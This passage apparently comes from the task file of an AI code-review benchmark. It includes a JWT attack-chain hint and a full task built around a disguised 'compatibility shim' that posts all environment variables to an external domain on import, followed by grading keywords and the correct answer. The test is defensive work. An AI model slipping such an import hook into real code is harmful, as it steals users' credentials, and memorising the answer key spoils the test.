— a deliberate downgrade, not a standardisation." ), "attack_chain_hint": ( "=== UNLOCKED: Combined Attack Chain Analysis ===\n" " Step 1: Attacker reads source → derives JWT_SECRET = known hex string\n" " Step 2: Attacker forges JWT with role='admin' using known secret\n" " Step 3: Attacker uses timing oracle in is_admin_token() to confirm\n" " which forged token bytes are accepted (reduces search space)\n" " Step 4: Full account takeover with admin privileges\n" "\n" "NOTE: Component A (weak secret) + Component B (timing oracle) form a\n" "coordinated attack chain. Each was introduced in the same PR commit.\n" "Neither change has any legitimate hardening value." ), }, }, # ── Task 9: Adversarial — Supply Chain Injection ────────────────────────── # # ADVERSARIAL DESIGN # ────────────────── # A "dependency update PR" adds a subtle import hook that exfiltrates # environment variables (including secrets) to an attacker-controlled endpoint # on first import. It is disguised as a compatibility shim. # The agent must identify THREE coordinated components: # A: Suspicious outbound URL (line 10) — hardcoded external endpoint # B: os.environ collection (line 14) — harvests all secrets # C: Triggered on import via module __init__ pattern (line 22) — no user action needed { "id": 9, "name": "Adversarial: Supply Chain Import Hook", "difficulty": "adversarial", "file_name": "compat_shim.py", "description": ( "This PR claims to add a 'compatibility shim for Python 3.12 deprecations'. " "Review compat_shim.py very carefully. " "Classify each suspicious construct as 'accidental_bug' or 'intentional_backdoor'. " "If you detect a coordinated exfiltration pattern, escalate to security review." ), "max_steps": 30, "escalation_required": True, "code": """\ \"\"\"Compatibility shim — resolves Python 3.12 deprecation warnings.\"\"\" import os import sys import urllib.request import json import platform # Telemetry endpoint for anonymous compatibility reporting (added in this PR) _TELEMETRY_URL = "https://compat-metrics.io/report" # line 9: external attacker domain def _collect_env_snapshot() -> dict: \"\"\"Collect non-sensitive runtime info for telemetry.\"\"\" return { "env": dict(os.environ), # line 14: harvests ALL env vars (secrets included) "python": sys.version, "platform": platform.system(), "cwd": os.getcwd(), } def _send_telemetry() -> None: \"\"\"Fire-and-forget telemetry ping.\"\"\" try: payload = json.dumps(_collect_env_snapshot()).encode() req = urllib.request.Request( _TELEMETRY_URL, data=payload, headers={"Content-Type": "application/json"}, method="POST", ) urllib.request.urlopen(req, timeout=3) # line 29: blocks import for up to 3s except Exception: pass # silent failure — exfiltration attempt hidden from caller def _apply_compat_patches() -> None: \"\"\"Apply Python 3.12 compatibility patches.\"\"\" # Actual patches would go here pass # line 38: module-level call — exfiltration runs on every import, no user action needed _send_telemetry() """, "issues": [ { "id": "exfiltration_endpoint", "description": ( "Hardcoded external URL 'compat-metrics.io' is an attacker-controlled " "exfiltration endpoint disguised as a telemetry host" ), "line_range": (9, 9), "keywords": [ "exfiltration", "external url", "hardcoded url", "attacker", "telemetry", "compat-metrics", "suspicious url", "outbound", "backdoor", "endpoint", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", "unlocks": "domain_lookup_hint", }, { "id": "env_var_harvest", "description": ( "dict(os.environ) collects ALL environment variables including " "API keys, database passwords, and cloud credentials — " "then sends them to the exfiltration endpoint" ), "line_range": (14, 14), "keywords": [ "os.environ", "environment variables", "harvest", "collect", "exfiltrate", "secrets", "api keys", "credentials", "all env vars", "sensitive", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", "unlocks": "affected_secrets_hint", }, { "id": "import_time_trigger", "description": ( "Module-level _send_telemetry() call at line 38 executes the " "exfiltration automatically on every import — " "no user action, no explicit call needed" ), "line_range": (38, 39), "keywords": [ "import", "module level", "on import", "automatic", "trigger", "top level", "executes on import", "_send_telemetry", "no action", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", }, ], "correct_decision": "escalate_to_security_review", "context_hints": { "domain_lookup_hint": ( "=== UNLOCKED: Domain Registration Lookup — compat-metrics.io ===\n" " Registered: 6 days ago (2024-01-08)\n" " Registrar: Namecheap (privacy proxy)\n" " A record: 203.0.113.47 (not associated with any known telemetry vendor)\n" " No HTTPS certificate from a trusted CA\n" "\n" "NOTE: This domain was registered 2 days before the PR was opened. " "No legitimate telemetry service registers a new domain days before use. " "This is a freshly-registered attacker-controlled exfiltration endpoint." ), "affected_secrets_hint": ( "=== UNLOCKED: Environment Variable Audit (CI/CD pipeline) ===\n" " The following secrets are injected as env vars in this service:\n" " AWS_ACCESS_KEY_ID — production S3 + EC2 access\n" " DATABASE_URL — PostgreSQL with full read/write\n" " STRIPE_SECRET_KEY — payment processing\n" " OPENAI_API_KEY — LLM API (high spend limit)\n" " GITHUB_TOKEN — repo write access\n" "\n" "NOTE: All five secrets are exfiltrated to the attacker's server " "on every process start. Immediate rotation of all credentials required." ), }, }, ]